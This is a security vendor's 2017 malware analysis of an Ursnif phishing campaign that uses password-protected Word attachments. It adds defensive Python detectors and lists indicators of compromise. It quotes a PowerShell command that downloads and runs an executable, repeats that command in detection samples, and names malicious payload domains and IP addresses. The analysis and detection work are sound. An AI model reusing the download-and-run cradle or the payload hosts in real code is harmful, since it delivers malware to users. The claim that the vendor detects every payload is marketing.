Wave of Ursnif Variants Leveraging Password-Protected Documents Continues to Spread Worldwide

Apr 7, 2017

We are experiencing a surge of attacks, across the globe, by the banking and spyware family Ursnif. As recently described in the blog My Online Security, the attackers send phishing emails pretending to originate from the Australian online payment company Eway. This campaign dates back to mid-February, at the latest, having compromised victims in North America, Western Europe, Australia and Japan.

The emails contain a password-protected Word document (.docx). The password is given in the body of the email, which urges the victim to open the document with it. Because the attached document is password protected, it evades detection by AV, anti-malware and sandboxing solutions, none of which can inspect its contents. The sender, subject and content of the emails are all highly similar: the email is sent from an address in the newly registered domain ewaystore.info, and the subject reports the receipt of an approved order or purchase. Here is an example of one email's content:

Figure 1 – the content of the email
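One defensive check a mail gateway can apply to the attachment described above (an added example, not code from the original post): a password-protected .docx is no longer a ZIP package but an OLE Compound File carrying an "EncryptedPackage" stream, and that wrapper is recognisable even though the content is not. The sample bytes and the quarantine policy are constructed for this example.

```python
"""Flag Office attachments whose contents are locked behind a password.

Added example, not from the original post. A modern .docx is a ZIP
container (magic bytes PK 03 04). Saved with a password, it becomes an OLE
Compound File (magic D0 CF 11 E0 ...) whose directory contains an
"EncryptedPackage" stream, so scanners see only ciphertext. A mail
gateway can recognise that wrapper and hold the message for review.
"""
ZIP_MAGIC = b"PK\x03\x04"
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
# OLE directory entries store stream names as UTF-16LE.
ENCRYPTED_STREAM = "EncryptedPackage".encode("utf-16-le")


def classify_office_attachment(data: bytes) -> str:
    """Return 'ooxml', 'encrypted-ooxml', 'ole-legacy' or 'not-office'."""
    if data.startswith(ZIP_MAGIC):
        return "ooxml"                # plain .docx/.xlsx: scanners can unzip it
    if data.startswith(OLE_MAGIC):
        if ENCRYPTED_STREAM in data:
            return "encrypted-ooxml"  # password-protected: payload opaque to AV
        return "ole-legacy"           # binary .doc/.xls (may carry macros)
    return "not-office"


def should_quarantine(name: str, data: bytes) -> bool:
    """Policy for the case in the post: hold encrypted documents, and any
    attachment with an OOXML extension that is not really a ZIP package."""
    kind = classify_office_attachment(data)
    ooxml_name = name.lower().endswith((".docx", ".xlsx", ".pptx"))
    return kind == "encrypted-ooxml" or (ooxml_name and kind != "ooxml")


# Constructed samples (not real files): a header plus the stream-name bytes
# is enough to exercise the classifier offline.
SAMPLE_PLAIN = ZIP_MAGIC + b"\x14\x00" + b"\x00" * 64
SAMPLE_ENCRYPTED = OLE_MAGIC + b"\x00" * 504 + ENCRYPTED_STREAM + b"\x00\x00"

if __name__ == "__main__":
    for blob in (SAMPLE_PLAIN, SAMPLE_ENCRYPTED):
        kind = classify_office_attachment(blob)
        print("receipt.docx", kind, should_quarantine("receipt.docx", blob))
```

The string search for the stream name is a heuristic; a production gateway would walk the OLE directory with a proper parser, but the wrapper check alone already separates the unscannable attachment from an ordinary one.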

Once opened, the Word document displays pictures of PDF and EXCEL icons (supposedly containing a receipt) and upon clicking, invokes a PowerShell command that downloads and runs a malicious executable:

%ComSpec% /C PowerShell (New-Object System.Net.WebClient). DownloadFile ('http://%URL_CONTAINING_PAYLOAD%','%FILE_NAME%');Start-Process '%FILE_NAME%'
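A detection for the command line quoted above, written for this page as an added example rather than taken from the original post: it scores process-creation records (the CommandLine field of Sysmon event 1 or Windows 4688) and alerts only when a WebClient download to disk is paired with Start-Process. The "parent=... cmd=..." sample layout and the example.invalid host are constructed placeholders.

```python
"""Score process command lines for the download-and-run cradle above.

Added example, not from the original post. Whitespace and curly quotes
are normalised first because the observed command puts spaces around
"DownloadFile (" that a naive substring match would miss.
"""
import re

# Each indicator is a case-insensitive regex over the normalised line.
INDICATORS = {
    "cmd_launches_powershell": re.compile(r"(cmd(\.exe)?|%comspec%) /c powershell", re.I),
    "webclient_object": re.compile(r"new-object (system\.)?net\.webclient", re.I),
    "downloadfile_to_disk": re.compile(r"\. ?downloadfile ?\( ?['\"]https?://", re.I),
    "start_process": re.compile(r"start-process ['\"]?[^'\" ;]+\.exe", re.I),
    "launched_from_office": re.compile(r"parent=(winword|excel)\.exe", re.I),
}


def normalise(cmdline: str) -> str:
    """Fold curly quotes to ASCII and squeeze whitespace runs to one space."""
    folded = cmdline.replace("\u2018", "'").replace("\u2019", "'")
    return re.sub(r"\s+", " ", folded).strip()


def match_cradle(cmdline: str) -> list:
    """Return the names of the indicators present in the command line."""
    line = normalise(cmdline)
    return [name for name, rx in INDICATORS.items() if rx.search(line)]


def is_suspicious(cmdline: str) -> bool:
    """Alert only when a download to disk is paired with an execution step;
    that pairing, not WebClient use alone, is what the post describes."""
    hits = match_cradle(cmdline)
    return "downloadfile_to_disk" in hits and "start_process" in hits


# Constructed log lines; example.invalid is a placeholder, not a campaign IoC.
SAMPLE_LOGS = [
    "parent=WINWORD.EXE cmd=cmd.exe /C PowerShell (New-Object System.Net.WebClient). "
    "DownloadFile ('http://example.invalid/flash.exe','flash.exe');Start-Process 'flash.exe'",
    "parent=explorer.exe cmd=powershell.exe -Command (New-Object Net.WebClient)."
    "DownloadString('http://example.invalid/inventory.ps1')",
    "parent=cmd.exe cmd=powershell Get-ChildItem C:\\Temp",
]

if __name__ == "__main__":
    for log in SAMPLE_LOGS:
        print(is_suspicious(log), match_cradle(log))
```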

In most of the cases we have observed, the executable downloaded by PowerShell has the file name "flash.exe" or "player.exe" and carries a Flash Player icon. Once run, this executable enumerates a long list of registry keys and collects information about the target. The information gathered serves evasion, lays the ground for persistence and stealth, and provides the initial reconnaissance of the target. The malware collects the OS version, product ID and installation date, registers itself as a top-level exception handler (a classic anti-debugging technique), modifies proxy settings, checks for existing Outlook and Windows Live Mail accounts and installed programs, and collects browser history and cache. The information gathered is written to randomly named files in the following location: %users\%user%\AppData\Local\Temp\%file_name%.
The files are deleted after being sent via HTTP POST requests to one of the many possible C2 servers.

Figure 2 – a data file created and deleted after posting to the C2 server

Communication with the C2 servers is done over SSL:

Figure 3 – DNS requests for a C2 server followed by an SSL handshake

At this point, a second-stage payload is dropped. Some variants drop the additional executable or DLL after decrypting a section of the original PE; others download it from a C2 server. In either case, once the second-stage payload is loaded, code is injected into explorer.exe and execution continues from there:

Figure 4 – DLL dropped and loaded (sha256 716efba2287317a2c7a68947f966e7e6cbae1326cfa217873520330b0f7beb15)

An examination of the associated URLs and IP addresses revealed several interesting details. The infrastructure uses separate sets of IP addresses and URLs for serving the payload (the ones the PowerShell command points to) and for communication while the malware runs. The PowerShell command points to several .au domain names; however, they all resolve to three IP addresses located in the US. The C2s used for runtime communication vary considerably between variants. Different variants use different IP addresses and domain names, and the changes are consistent with the times at which the different variants surfaced. Almost all IP addresses originate from Eastern Europe, predominantly Ukraine, as well as Romania and Germany. The continuing change in C2 IP addresses and locations is most likely an effort on the attackers' side to make the infrastructure more difficult to trace. Deep Instinct's research team has been successful in expanding the number of known IoCs associated with this campaign.

It seems that Ursnif has come back on the scene, as we are witnessing several active phishing campaigns spreading Ursnif variants. A separate campaign spotted recently also uses password-protected documents as the initial dropper. In this related campaign, the documents embedded in the initial password-protected dropper invoke a malicious VBScript, which drops, decrypts and runs the payload.

Apart from the .docx files, which evade detection altogether, most payloads are not detected by the majority of security solutions for several days after they appear in the wild, leaving the door open for attackers to compromise many victims. Deep Instinct's solution accurately detects all associated payloads by leveraging its strong, deep-learning-based capabilities to identify new, unseen malware.

IoC:

Droppers (doc files) SHA-256


Addresses used for serving payload
URLs

resilienceconsulting.com.au westonsocialgolfclub.com
windsorpc.com.au earlychildhoodconsulting.com.au
masterconstructions.com.au kwazii.com.au
dllfiles.org/dllfiles

IP Addresses

192.185.162.71
192.185.162.104
192.185.162.105


Malicious Payloads (PE)

C2 servers

URLs


IP Addresses


Associated Email addresses
customer@ewaystore[.]info
helpandcare@ewaystore[.]info